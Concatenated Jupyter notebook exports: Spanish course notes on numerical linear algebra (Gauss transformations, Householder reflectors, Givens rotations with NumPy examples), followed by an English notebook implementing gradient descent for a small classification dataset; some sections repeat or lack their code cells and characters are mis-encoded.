que en el ejemplo anterior como $v=(1,1)^T$ entonces: $cos(\theta)=\frac{1}{\sqrt{2}}, sen(\theta)=\frac{1}{\sqrt{2}}$ por lo que $\theta=\frac{\pi}{4}$ y:
$$
R_O=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}\\
-\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido de las manecillas del reloj**.
Para **hacer cero la entrada $v_1$ de $v$** hay que usar:
$$\begin{array}{l}
R_O=\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & -\frac{1}{\sqrt{2}}\\
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
\end{array}
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido contrario de las manecillas del reloj**.
```{admonition} Ejercicio
:class: tip
Usar una matriz de rotaciรณn Givens para rotar al vector $(-3, 4)^T$ un รกngulo de $\frac{\pi}{3}$ en sentido de las manecillas del reloj.
```
### Ejemplo aplicando rotaciones Givens a una matriz
Las rotaciones Givens permiten hacer ceros en entradas de una matriz que son **seleccionadas**. Por ejemplo si se desea hacer cero la entrada $x_4$ de $x \in \mathbb{R}^4$, se definen $cos\theta = \frac{x_2}{\sqrt{x_2^2 + x_4^2}}, sen\theta = \frac{x_4}{\sqrt{x_2^2 + x_4^2}}$ y
$$
R_{24}^\theta=
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\right ]
$$
entonces:
$$
R_{24}^\theta x =
\begin{array}{l}
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\rightย ]
\left [
\begin{array}{c}
x_1 \\
x_2 \\
x_3 \\
x_4
\end{array}
\right ]
=
\left [
\begin{array}{c}
x_1 \\
\sqrt{x_2^2 + x_4^2} \\
x_3 \\
0
\end{array}
\right ]
\end{array}
$$
Y se escribe que se hizo una rotaciรณn en el plano $(2,4)$.
```{admonition} Observaciรณn
:class: tip
Obsรฉrvese que sรณlo se modificaron dos entradas de $x$: $x_2, x_4$ por lo que el mismo efecto se obtiene al hacer la multiplicaciรณn:
$$
\begin{array}{l}
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
\left [
\begin{array}{c}
x_2\\
x_4
\end{array}
\right ]
\end{array}
$$
para tales entradas.
```
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 4}$:
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
y aplรญquense rotaciones Givens para hacer ceros en las entradas debajo de la diagonal de $A$ y tener una matriz **triangular superior**.
**Entrada $a_{21}$, plano $(1,2)$:**
```
idx_1 = 0
idx_2 = 1
idx_column = 0
A = np.array([[4, 1, -2, 2],
[1, 2, 0, 1],
[-2, 0, 3, -2],
[2, 1, -2, -1]], dtype=float)
print(A)
a_11 = A[idx_1,idx_column]
a_21 = A[idx_2,idx_column]
norm = math.sqrt(a_11**2 + a_21**2)
cos_theta = a_11/norm
sen_theta = a_21/norm
R12 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R12)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A_subset = np.row_stack((A[idx_1,:], A[idx_2,:]))
print(A_subset)
print(R12@A_subset)
A1_aux = R12@A_subset
print(A1_aux)
```
Hacemos copia para un fรกcil manejo de los รญndices y matrices modificadas. Podrรญamos tambiรฉn usar [numpy.view](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.view.html).
```
A1 = A.copy()
A1[idx_1, :] = A1_aux[0, :]
A1[idx_2, :] = A1_aux[1, :]
```
```{margin}
$A^{(1)} = R_{12}^\theta A^{(0)}$.
```
```
print(A1)
print(A)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A1[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{31}$, plano $(1,3)$:**
```
idx_1 = 0
idx_2 = 2
idx_column = 0
a_11 = A1[idx_1, idx_column]
a_31 = A1[idx_2, idx_column]
norm = math.sqrt(a_11**2 + a_31**2)
cos_theta = a_11/norm
sen_theta = a_31/norm
R13 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R13)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A1_subset = np.row_stack((A1[idx_1,:], A1[idx_2,:]))
print(A1_subset)
print(R13@A1_subset)
A2_aux = R13@A1_subset
print(A2_aux)
A2 = A1.copy()
A2[idx_1, :] = A2_aux[0, :]
A2[idx_2, :] = A2_aux[1, :]
```
```{margin}
$A^{(2)} = R_{13}^\theta A^{(1)}$.
```
```
print(A2)
print(A1)
print(A)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A2[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{41}$, plano $(1,4)$:**
```
idx_1 = 0
idx_2 = 3
idx_column = 0
a_11 = A2[idx_1, idx_column]
a_41 = A2[idx_2, idx_column]
norm = math.sqrt(a_11**2 + a_41**2)
cos_theta = a_11/norm
sen_theta = a_41/norm
R14 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R14)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A2_subset = np.row_stack((A2[idx_1,:], A2[idx_2,:]))
print(A2_subset)
print(R14@A2_subset)
A3_aux = R14@A2_subset
print(A3_aux)
A3 = A2.copy()
A3[idx_1, :] = A3_aux[0, :]
A3[idx_2, :] = A3_aux[1, :]
```
```{margin}
$A^{(3)} = R_{14}^\theta A^{(2)}$.
```
```
print(A3)
print(A2)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A3[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{32}$, plano $(2,3)$:**
```
idx_1 = 1
idx_2 = 2
idx_column = 1
a_22 = A2[idx_1, idx_column]
a_32 = A2[idx_2, idx_column]
norm = math.sqrt(a_22**2 + a_32**2)
cos_theta = a_22/norm
sen_theta = a_32/norm
R23 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R23)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A3_subset = np.row_stack((A3[idx_1,:], A3[idx_2,:]))
print(A3_subset)
print(R23@A3_subset)
A4_aux = R23@A3_subset
print(A4_aux)
A4 = A3.copy()
A4[idx_1, :] = A4_aux[0, :]
A4[idx_2, :] = A4_aux[1, :]
```
```{margin}
$A^{(4)} = R_{23}^\theta A^{(3)}$.
```
```
print(A4)
print(A3)
print(A2)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,2]$.
```
```
print(np.linalg.norm(A4[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
```{admonition} Ejercicio
:class: tip
Finalizar el ejercicio para llevar a la matriz $A$ a una matriz triangular superior.
```
```{admonition} Ejercicios
:class: tip
1.Resuelve los ejercicios y preguntas de la nota.
```
**Preguntas de comprehensiรณn.**
1)Escribe ejemplos de operaciones vectoriales y matriciales bรกsicas del รlgebra Lineal Numรฉrica.
2)ยฟPara quรฉ se utilizan las transformaciones de Gauss?
3)Escribe nombres de factorizaciones en las que se utilizan las transformaciones de Gauss.
4)Escribe propiedades que tiene una matriz ortogonal.
5)ยฟUna matriz ortogonal es rectangular?
6)ยฟQuรฉ propiedades tienen las matrices de proyecciรณn, reflexiรณn y rotaciรณn?
7)ยฟQuรฉ problema numรฉrico se quiere resolver al definir un vector de Householder como $x+signo(x_1)||x||_2e_1$?
**Referencias:**
1. G. H. Golub, C. F. Van Loan, Matrix Computations, John Hopkins University Press, 2013.
|
github_jupyter
|
---
Nota generada a partir de [liga1](https://www.dropbox.com/s/fyqwiqasqaa3wlt/3.1.1.Multiplicacion_de_matrices_y_estructura_de_datos.pdf?dl=0), [liga2](https://www.dropbox.com/s/jwu8lu4r14pb7ut/3.2.1.Sistemas_de_ecuaciones_lineales_eliminacion_Gaussiana_y_factorizacion_LU.pdf?dl=0) y [liga3](https://www.dropbox.com/s/s4ch0ww1687pl76/3.2.2.Factorizaciones_matriciales_SVD_Cholesky_QR.pdf?dl=0).
Las operaciones bรกsicas del รlgebra Lineal Numรฉrica podemos dividirlas en vectoriales y matriciales.
## Vectoriales
* **Transponer:** $\mathbb{R}^{n \times 1} \rightarrow \mathbb{R} ^{1 \times n}$: $y = x^T$ entonces $x = \left[ \begin{array}{c} x_1 \\ x_2 \\ \vdots \\ x_n \end{array} \right ]$ y se tiene: $y = x^T = [x_1, x_2, \dots, x_n].$
* **Suma:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x + y$ entonces $z_i = x_i + y_i$
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $y = \alpha x$ entonces $y_i = \alpha x_i$.
* **Producto interno estรกndar o producto punto:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}$: $c = x^Ty$ entonces $c = \displaystyle \sum_{i=1}^n x_i y_i$.
* **Multiplicaciรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x.*y$ entonces $z_i = x_i y_i$.
* **Divisiรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x./y$ entonces $z_i = x_i /y_i$ con $y_i \neq 0$.
* **Producto exterior o *outer product*:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^{n \times n}$: $A = xy^T$ entonces $A[i, :] = x_i y^T$ con $A[i,:]$ el $i$-รฉsimo renglรณn de $A$.
## Matriciales
* **Transponer:** $\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{n \times m}$: $C = A^T$ entonces $c_{ij} = a_{ji}$.
* **Sumar:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A + B$ entonces $c_{ij} = a_{ij} + b_{ij}$.
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = \alpha A$ entonces $c_{ij} = \alpha a_{ij}$
* **Multiplicaciรณn por un vector:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{n} \rightarrow \mathbb{R}^{m}$: $y = Ax$ entonces $y_i = \displaystyle \sum_{j=1}^n a_{ij}x_j$.
* **Multiplicaciรณn entre matrices:** $\mathbb{R}^{m \times k} \times \mathbb{R}^{k \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = AB$ entonces $c_{ij} = \displaystyle \sum_{r=1}^k a_{ir}b_{rj}$.
* **Multiplicaciรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A.*B$ entonces $c_{ij} = a_{ij}b_{ij}$.
* **Divisiรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A./B$ entonces $c_{ij} = a_{ij}/b_{ij}$ con $b_{ij} \neq 0$.
**Como ejemplos de transformaciones bรกsicas del รlgebra Lineal Numรฉrica se encuentran:**
(TGAUSS)=
## Transformaciones de Gauss
En esta secciรณn suponemos que $A \in \mathbb{R}^{n \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{n \times n} \forall i,j=1,2,\dots,n$.
Considรฉrese al vector $a \in \mathbb{R}^{n}$ y $e_k \in \mathbb{R}^n$ el $k$-รฉsimo vector canรณnico: vector con un $1$ en la posiciรณn $k$ y ceros en las entradas restantes.
Las transformaciones de Gauss se utilizan para hacer ceros por debajo del **pivote**.
(EG1)=
### Ejemplo aplicando transformaciones de Gauss a un vector
Considรฉrese al vector $a=(-2,3,4)^T$. Definir una transformaciรณn de Gauss para hacer ceros por debajo de $a_1$ y otra transformaciรณn de Gauss para hacer cero la entrada $a_3$
**Soluciรณn:**
a)Para hacer ceros por debajo del **pivote** $a_1 = -2$:
A continuaciรณn se muestra que el producto $L_1 a$ si se construye $L_1$ es equivalente a lo anterior:
b) Para hacer ceros por debajo del **pivote** $a_2 = 3$:
A continuaciรณn se muestra que el producto $L_2 a$ si se construye $L_2$ es equivalente a lo anterior:
(EG2)=
### Ejemplo aplicando transformaciones de Gauss a una matriz
Si tenemos una matriz $A \in \mathbb{R}^{3 \times 3}$ y queremos hacer ceros por debajo de su **diagonal** y tener una forma **triangular superior**, realizamos los productos matriciales:
$$L_2 L_1 A$$
donde: $L_1, L_2$ son transformaciones de Gauss.
Posterior a realizar el producto $L_2 L_1 A$ se obtiene una **matriz triangular superior:**
$$
L_2L_1A = \left [
\begin{array}{ccc}
* & * & *\\
0 & * & * \\
0 & 0 & *ย
\end{array}
\right ]
$$
**Ejemplo:**
a) Utilizando $L_1$
Para hacer ceros por debajo del **pivote** $a_{11} = -1$:
**Y se debe aplicar $L_1$ a las columnas nรบmero 2 y 3 de $A$ para completar el producto $L_1A$:**
A continuaciรณn se muestra que el producto $L_1 A$ si se construye $L_1$ es equivalente a lo anterior:
(EG2.1)=
**Despuรฉs de hacer la multiplicaciรณn $L_1A$ en cualquiera de los dos casos (construyendo o no explรญcitamente $L_1$) no se modifica el primer renglรณn de $A$:**
**por lo que la multiplicaciรณn $L_1A$ entonces modifica del segundo renglรณn de $A$ en adelante y de la segunda columna de $A$ en adelante.**
y puede escribirse de forma compacta:
$$e_1^T A[1:3,2:3] = A[0, 2:3]$$
Entonces los productos $\ell_1 e_1^T A[:,2]$ y $\ell_1 e_1^T A[:,3]$ quedan respectivamente como:
$$\ell_1A[0, 2]$$
$$\ell_1A[0,3]$$
De forma compacta y aprovechando funciones en *NumPy* como [np.outer](https://numpy.org/doc/stable/reference/generated/numpy.outer.html) se puede calcular lo anterior como:
Y finalmente la aplicaciรณn de $L_1$ al segundo renglรณn y segunda columna en adelante de $A$ queda:
Compรกrese con:
Entonces sรณlo falta colocar el primer renglรณn y primera columna al producto. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
que es el resultado de:
**Lo que falta para obtener una matriz triangular superior es hacer la multiplicaciรณn $L_2L_1A$.** Para este caso la matriz $L_2=I_3 - \ell_2e_2^T$ utiliza $\ell_2 = \left( 0, 0, \frac{a^{(1)}_{32}}{a^{(1)}_{22}} \right )^T$ donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = L_1A^{(0)}$ y $A^{(0)}=A$.
(MATORTMATCOLORTONO)=
## Matriz ortogonal y matriz con columnas ortonormales
Un conjunto de vectores $\{x_1, \dots, x_p\}$ en $\mathbb{R}^m$ ($x_i \in \mathbb{R}^m$)es ortogonal si $x_i^Tx_j=0$ $\forall i\neq j$. Por ejemplo, para un conjunto de $2$ vectores $x_1,x_2$ en $\mathbb{R}^3$ esto se visualiza:
<img src="https://dl.dropboxusercontent.com/s/cekagqnxe0grvu4/vectores_ortogonales.png?dl=0" heigth="550" width="550">
(TREF)=
## Transformaciones de reflexiรณn
En esta secciรณn suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{m \times n} \forall i=1,2,\dots,m, j=1, 2, \dots, n$.
### Reflectores de Householder
Un dibujo que ayuda a visualizar el reflector elemental alrededor de $u^\perp$ en el que se utiliza $u \in \mathbb{R}^m - \{0\}$ , $||u||_2 = 1$ y $R=I_m-2 u u^T$ es el siguiente :
<img src="https://dl.dropboxusercontent.com/s/o3oht181nm8lfit/householder_drawing.png?dl=0" heigth="350" width="350">
Las reflexiones de Householder pueden utilizarse para hacer ceros por debajo de una entrada de un vector.
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al vector $x=(1,2,3)^T$. Definir un reflector de Householder para hacer ceros por debajo de $x_1$.
Utilizamos la definiciรณn $v=x-||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico para construir al vector de Householder:
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
El resultado de $Rx$ es $(||x||_2,0,0)^T$ con $||x||_2$ dada por:
A continuaciรณn se muestra que el producto $Rx$ si se construye $R$ es equivalente a lo anterior:
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al mismo vector $x$ del ejemplo anterior y el mismo objetivo "Definir un reflector de Householder para hacer ceros por debajo de $x_1$.". Otra opciรณn para construir al vector de Householder es $v=x+||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico:
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
### ยฟCuรกl definiciรณn del vector de Householder usar?
En cualquiera de las dos definiciones del vector de Householder $v=x \pm ||x||_2 e_1$, la multiplicaciรณn $Rx$ refleja $x$ en el primer eje coordenado (pues se usa $e_1$):
<img src="https://dl.dropboxusercontent.com/s/bfk7gojxm93ah5s/householder_2_posibilites.png?dl=0" heigth="400" width="400">
El vector $v^+ = - u_0^+ = x-||x||_2e_1$ refleja $x$ respecto al subespacio $H^+$ (que en el dibujo es una recta que cruza el origen). El vector $v^- = -u_0^- = x+||x||_2e_1$ refleja $x$ respecto al subespacio $H^-$.
Para reducir los errores por redondeo y evitar el problema de cancelaciรณn en la aritmรฉtica de punto flotante (ver [Sistema de punto flotante](https://itam-ds.github.io/analisis-numerico-computo-cientifico/I.computo_cientifico/1.2/Sistema_de_punto_flotante.html)) se utiliza:
$$v = x+signo(x_1)||x||_2e_1$$
donde: $signo(x_1) = \begin{cases}
1 &\text{ si } x_1 \geq 0 ,\\
-1 &\text{ si } x_1 < 0
\end{cases}.$
La idea de la definciรณn anterior con la funciรณn $signo(\cdot)$ es que la reflexiรณn (en el dibujo anterior $-||x||_2e_1$ o $||x||_2e_1$) sea lo mรกs alejada posible de $x$. En el dibujo anterior como $x_1, x_2>0$ entonces se refleja respecto al subespacio $H^-$ quedando su reflexiรณn igual a $-||x||_2e_1$.
### Ejemplo aplicando reflectores de Householder a una matriz
Las reflexiones de Householder se utilizan para hacer ceros por debajo de la **diagonal** a una matriz y tener una forma triangular superior (mismo objetivo que las transformaciones de Gauss, ver {ref}`Ejemplo aplicando transformaciones de Gauss a una matriz <EG2>`). Por ejemplo si se han hecho ceros por debajo del elemento $a_{11}$ y se quieren hacer ceros debajo de $a_{22}^{(1)}$:
$$\begin{array}{l}
R_2A^{(1)} = R_2
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & * & * & * \\
0 & * & * & * \\
0 & * & * & *
\end{array}
\right]
=
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & 0 & * & * \\
0 & 0 & * & * \\
0 & 0 & * & *
\end{array}
\right]
:= A^{(2)}
\end{array}
$$
donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = R_1A^{(0)}$ y $A^{(0)}=A$, $R_1$ es matriz de reflexiรณn de Householder.
En este caso
$$R_2 =
\left [
\begin{array}{cc}
1 & 0 \\
0 & \hat{R_2}
\end{array}
\right ]
$$
con $\hat{R}_2$ una matriz de reflexiรณn de Householder que hace ceros por debajo de de $a_{22}^{(1)}$. Se tienen las siguientes propiedades de $R_2$:
* No modifica el primer renglรณn de $A^{(1)}$.
* No destruye los ceros de la primer columna de $A^{(1)}$.
* $R_2$ es una matriz de reflexiรณn de Householder.
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 3}$:
$$A =
\left [
\begin{array}{ccc}
3 & 2 & -1 \\
2 & 3 & 2 \\
-1 & 2 & 3 \\
2 & 1 & 4
\end{array}
\right ]
$$
y aplรญquense reflexiones de Householder para llevarla a una forma triangular superior.
**A continuaciรณn queremos hacer ceros debajo de la segunda entrada de la segunda columna de $A^{(1)}$.**
**A continuaciรณn queremos hacer ceros debajo de la tercera entrada de la tercera columna de $A^{(2)}$.**
Entonces sรณlo falta colocar los renglones y columnas para tener a la matriz $A^{(3)}$. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
La matriz $A^{(3)} = R_3 R_2 R_1 A^{(0)}$ es:
Podemos verificar lo anterior comparando con la matriz $R$ de la factorizaciรณn $QR$ de $A$:
(TROT)=
## Transformaciones de rotaciรณn
En esta secciรณn suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{m \times n} \forall i=1,2,\dots,m, j=1, 2, \dots, n$.
Si $u, v \in \mathbb{R}^2-\{0\}$ con $\ell = ||u||_2 = ||v||_2$ y se desea rotar al vector $u$ en sentido contrario a las manecillas del reloj por un รกngulo $\theta$ para llevarlo a la direcciรณn de $v$:
<img src="https://dl.dropboxusercontent.com/s/vq8eu0yga2x7cb2/rotation_1.png?dl=0" heigth="500" width="500">
A partir de las relaciones anteriores como $cos(\phi)=\frac{u_1}{\ell}, sen(\phi)=\frac{u_2}{\ell}$ se tiene: $v_1 = (cos\theta)u_1-(sen\theta)u_2$, $v_2=(sen\theta)u_1+(cos\theta)u_2$ equivalentemente:
$$\begin{array}{l}
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]
=
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right] \cdot
\left[\begin{array}{c}
u_1\\
u_2
\end{array}
\right]
\end{array}
$$
### Ejemplo aplicando rotaciones Givens a un vector
Rotar al vector $v=(1,1)^T$ un รกngulo de $45^o$ en **sentido contrario a las manecillas del reloj**.
La matriz $R_O$ es:
$$R_O = \left[ \begin{array}{cc}
cos(\frac{\pi}{4}) & -sen(\frac{\pi}{4})\\
sen(\frac{\pi}{4}) & cos(\frac{\pi}{4})
\end{array}
\right ]
$$
En el ejemplo anterior se hizo cero la entrada $v_1$ de $v$. Las matrices de rotaciรณn se utilizan para hacer ceros en entradas de un vector. Por ejemplo si $v=(v_1,v_2)^T$ y **se desea hacer cero la entrada $v_2$ de $v$** se puede utilizar la matriz de rotaciรณn:
$$R_O = \left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
$$
pues:
$$\begin{array}{l}
\left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ] \cdot
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
\frac{-v_1v_2+v_1v_2}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
0
\end{array}
\right ]=
\left[ \begin{array}{c}
||v||_2\\
0
\end{array}
\right ]
\end{array}
$$
Y definiendo $cos(\theta)=\frac{v_1}{\sqrt{v_1^2+v_2^2}}, sen(\theta)=\frac{v_2}{\sqrt{v_1^2+v_2^2}}$ se tiene :
$$
R_O=\left[ \begin{array}{cc}
cos\theta & sen\theta\\
-sen\theta & cos\theta
\end{array}
\right]
$$
que en el ejemplo anterior como $v=(1,1)^T$ entonces: $cos(\theta)=\frac{1}{\sqrt{2}}, sen(\theta)=\frac{1}{\sqrt{2}}$ por lo que $\theta=\frac{\pi}{4}$ y:
$$
R_O=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}\\
-\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido de las manecillas del reloj**.
Para **hacer cero la entrada $v_1$ de $v$** hay que usar:
$$\begin{array}{l}
R_O=\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & -\frac{1}{\sqrt{2}}\\
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
\end{array}
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido contrario de las manecillas del reloj**.
### Ejemplo aplicando rotaciones Givens a una matriz
Las rotaciones Givens permiten hacer ceros en entradas de una matriz que son **seleccionadas**. Por ejemplo si se desea hacer cero la entrada $x_4$ de $x \in \mathbb{R}^4$, se definen $cos\theta = \frac{x_2}{\sqrt{x_2^2 + x_4^2}}, sen\theta = \frac{x_4}{\sqrt{x_2^2 + x_4^2}}$ y
$$
R_{24}^\theta=
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\right ]
$$
entonces:
$$
R_{24}^\theta x =
\begin{array}{l}
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\rightย ]
\left [
\begin{array}{c}
x_1 \\
x_2 \\
x_3 \\
x_4
\end{array}
\right ]
=
\left [
\begin{array}{c}
x_1 \\
\sqrt{x_2^2 + x_4^2} \\
x_3 \\
0
\end{array}
\right ]
\end{array}
$$
Y se escribe que se hizo una rotaciรณn en el plano $(2,4)$.
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 4}$:
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
y aplรญquense rotaciones Givens para hacer ceros en las entradas debajo de la diagonal de $A$ y tener una matriz **triangular superior**.
**Entrada $a_{21}$, plano $(1,2)$:**
Hacemos copia para un fรกcil manejo de los รญndices y matrices modificadas. Podrรญamos tambiรฉn usar [numpy.view](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.view.html).
**Entrada $a_{31}$, plano $(1,3)$:**
**Entrada $a_{41}$, plano $(1,4)$:**
**Entrada $a_{32}$, plano $(2,3)$:**
| 0.788298 | 0.965414 |
<a href="https://colab.research.google.com/github/BenM1215/udacity-intro-pytorch/blob/master/GradientDescent.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Implementing the Gradient Descent Algorithm
In this lab, we'll implement the basic functions of the Gradient Descent algorithm to find the boundary in a small dataset. First, we'll start with some functions that will help us plot and visualize the data.
```
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
#Some helper functions for plotting and drawing lines
def plot_points(X, y):
admitted = X[np.argwhere(y==1)]
rejected = X[np.argwhere(y==0)]
plt.scatter([s[0][0] for s in rejected], [s[0][1] for s in rejected], s = 25, color = 'blue', edgecolor = 'k')
plt.scatter([s[0][0] for s in admitted], [s[0][1] for s in admitted], s = 25, color = 'red', edgecolor = 'k')
def display(m, b, color='g--'):
plt.xlim(-0.05,1.05)
plt.ylim(-0.05,1.05)
x = np.arange(-10, 10, 0.1)
plt.plot(x, m*x+b, color)
```
## Reading and plotting the data
```
data = pd.read_csv('https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/intro-neural-networks/gradient-descent/data.csv', header=None)
X = np.array(data[[0,1]])
y = np.array(data[2])
plot_points(X,y)
plt.show()
```
## TODO: Implementing the basic functions
Here is your turn to shine. Implement the following formulas, as explained in the text.
- Sigmoid activation function
$$\sigma(x) = \frac{1}{1+e^{-x}}$$
- Output (prediction) formula
$$\hat{y} = \sigma(w_1 x_1 + w_2 x_2 + b)$$
- Error function
$$Error(y, \hat{y}) = - y \log(\hat{y}) - (1-y) \log(1-\hat{y})$$
- The function that updates the weights
$$ w_i \longrightarrow w_i + \alpha (y - \hat{y}) x_i$$
$$ b \longrightarrow b + \alpha (y - \hat{y})$$
```
# Implement the following functions
# Activation (sigmoid) function
def sigmoid(x):
sig_x = 1./(1.+np.exp(-x))
return sig_x
# Output (prediction) formula
def output_formula(features, weights, bias):
return sigmoid(np.dot(features, weights) + bias)
# Error (log-loss) formula
def error_formula(y, output):
E = -y*np.log(output) - (1-y)*np.log(1-output)
return E
# Gradient descent step
def update_weights(x, y, weights, bias, learnrate):
output = output_formula(x, weights, bias)
d_error = y - output
weights += learnrate * d_error * x
bias += learnrate * d_error
return weights, bias
```
## Training function
This function will help us iterate the gradient descent algorithm through all the data, for a number of epochs. It will also plot the data, and some of the boundary lines obtained as we run the algorithm.
```
np.random.seed(44)
epochs = 100
learnrate = 0.01
